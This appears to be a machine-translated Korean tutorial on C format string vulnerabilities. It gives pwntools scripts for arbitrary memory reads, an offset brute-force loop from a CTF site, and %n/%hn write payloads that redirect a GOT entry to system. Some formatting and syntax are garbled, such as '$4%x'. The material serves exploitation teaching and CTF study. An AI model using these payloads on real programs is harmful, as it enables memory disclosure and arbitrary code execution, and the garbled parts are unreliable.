C 언어에서 **printf**는 문자열을 출력하는 데 사용할 수 있는 함수입니다. 이 함수가 기대하는 첫 번째 매개변수는 포매터가 있는 원시 텍스트입니다. 기대되는 다음 매개변수는 원시 텍스트에서 포매터를 대체할 값입니다.
다른 취약한 함수로는 **sprintf()**와 **fprintf()**가 있습니다.
취약점은 공격자 텍스트가 이 함수의 첫 번째 인수로 사용될 때 발생합니다. 공격자는 printf 포맷 문자열 기능을 악용하여 특수 입력을 조작하여 모든 주소의 데이터를 읽고 쓸 수 있습니다(읽기/쓰기 가능). 이렇게 함으로써 임의의 코드를 실행할 수 있습니다.
포맷터:
%08x —>8hexbytes%d —>Entire%u —>Unsigned%s —>String%p —>Pointer%n —>Numberofwrittenbytes%hn —>Occupies2bytesinsteadof4<n>$X —> Direct access, Example: ("%3$d",var1,var2,var3) —> Access to var3
예시:
취약한 예제:
char buffer[30];gets(buffer); // Dangerous: takes user input without restrictions.printf(buffer); // If buffer contains "%x", it reads from the stack.
일반적인 사용:
int value =1205;printf("%x%x%x", value, value, value); // Outputs: 4b5 4b5 4b5
누락된 인수가 있는 경우:
printf("%x%x%x", value); // Unexpected output: reads random values from the stack.
fprintf 취약점:
#include<stdio.h>intmain(int argc,char*argv[]) {char*user_input;user_input = argv[1];FILE *output_file =fopen("output.txt","w");fprintf(output_file, user_input); // The user input cna include formatters!fclose(output_file);return0;}
포인터 접근
형식 %<n>$x, 여기서 n은 숫자로, printf에게 n번째 매개변수(스택에서)를 선택하도록 지시할 수 있습니다. 따라서 printf를 사용하여 스택에서 4번째 매개변수를 읽고 싶다면 다음과 같이 할 수 있습니다:
printf("%x%x%x%x")
그리고 첫 번째부터 네 번째 매개변수까지 읽을 수 있습니다.
또는 다음을 수행할 수 있습니다:
printf("$4%x")
그리고 직접 네 번째를 읽으십시오.
공격자가 printf 매개변수를 제어한다는 점에 유의하십시오. 이는 공격자의 입력이 printf가 호출될 때 스택에 있을 것을 의미하며, 이는 그가 스택에 특정 메모리 주소를 쓸 수 있다는 것을 의미합니다.
이 입력을 제어하는 공격자는 임의의 주소를 스택에 추가하고 printf가 그에 접근하도록 만들 수 있습니다. 다음 섹션에서 이 동작을 사용하는 방법에 대해 설명될 것입니다.
임의의 읽기
포맷터 **%n$s**를 사용하여 **printf**가 n 위치에 있는 주소를 가져와 그 뒤를 따라가서 문자열처럼 출력할 수 있습니다(0x00이 발견될 때까지 출력). 따라서 이진 파일의 기본 주소가 **0x8048000**이고, 사용자 입력이 스택의 4번째 위치에서 시작한다는 것을 알고 있다면, 이진 파일의 시작을 다음과 같이 출력할 수 있습니다:
from pwn import*p =process('./bin')payload =b'%6$s'#4th parampayload +=b'xxxx'#5th param (needed to fill 8bytes with the initial input)payload +=p32(0x8048000)#6th paramp.sendline(payload)log.info(p.clean())# b'\x7fELF\x01\x01\x01||||'
주소 0x8048000을 입력의 시작 부분에 넣을 수 없습니다. 왜냐하면 해당 주소의 끝에 0x00이 cat될 것이기 때문입니다.
오프셋 찾기
입력의 오프셋을 찾으려면 4 또는 8바이트(0x41414141)를 보낸 다음 **%1$x**를 뒤에 붙이고 A's를 검색할 때까지 값을 증가시킬 수 있습니다.
printf 오프셋 브루트 포스
```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
from pwn import *
Iterate over a range of integers
for i in range(10):
Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()
Start a new process of the "chall" binary
p = process("./chall")
Send the payload to the process
p.sendline(payload)
Read and store the output of the process
output = p.clean()
Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}") break
Close the process
p.close()
</details>
### 얼마나 유용한가요
임의의 읽기는 다음과 같은 용도로 유용할 수 있습니다:
- 메모리에서 **바이너리를 덤프**합니다.
- 민감한 정보가 저장된 메모리의 특정 부분에 **액세스**합니다(예: canaries, 암호화 키 또는 사용자 지정 암호와 같은 [CTF 챌린지](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)에서).
## 임의 쓰기
포매터 **`$<num>%n`**은 스택의 \<num> 매개변수에 **지정된 주소**에 **쓰여진 바이트 수**를 **쓰기**합니다. 공격자가 printf로 원하는 만큼 문자를 쓸 수 있다면, **`$<num>%n`**을 사용하여 임의의 숫자를 임의의 주소에 쓸 수 있습니다.
다행히도, 숫자 9999를 쓰기 위해 입력에 9999개의 "A"를 추가할 필요가 없습니다. **`%.<num-write>%<num>$n`** 포매터를 사용하여 **`<num-write>`** 숫자를 **`num` 위치가 가리키는 주소**에 쓸 수 있습니다.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
그러나 주소를 작성할 때 보통 0x08049724와 같은 주소를 한 번에 작성하는 대신 **$n 대신 $hn**을 사용합니다. 이를 통해 2바이트만 작성할 수 있습니다. 따라서 이 작업은 주소의 상위 2바이트와 하위 2바이트에 대해 두 번 수행됩니다.
따라서 이 취약점을 통해 임의의 주소에 임의의 내용을 쓸 수 있습니다 (임의 쓰기).
이 예에서 목표는 나중에 호출될 GOT 테이블의 함수의 주소를 덮어쓰는 것입니다. 이는 다른 임의 쓰기를 실행하는 기술을 악용할 수 있습니다:
사용자로부터 인수를 받는 함수의 주소를 system함수로 지정할 것입니다.
언급한대로 주소를 작성하려면 보통 2단계가 필요합니다: 먼저 주소의 2바이트를 작성한 다음 나머지 2바이트를 작성합니다. 이를 위해 **$hn**이 사용됩니다.
HOB는 주소의 상위 2바이트를 가리킵니다.
LOB는 주소의 하위 2바이트를 가리킵니다.
그런 다음, 형식 문자열이 작동하는 방식 때문에 [HOB, LOB] 중 먼저 작은 값을 작성한 다음 다른 값을 작성해야 합니다.
만약 HOB < LOB이면
[주소+2][주소]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]
만약 HOB > LOB이면
[주소+2][주소]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]
32비트, relro, 캐너리 없음, nx, pie 없음, .fini_array 내부의 main 주소에 주소를 쓰기 위한 서식 문자열 (흐름이 1번 더 루프되도록) 및 strlen을 가리키는 GOT 테이블에 system 주소를 쓰기. 흐름이 main으로 돌아가면 사용자 입력과 함께 strlen이 실행되고 system을 가리키므로 전달된 명령을 실행합니다.
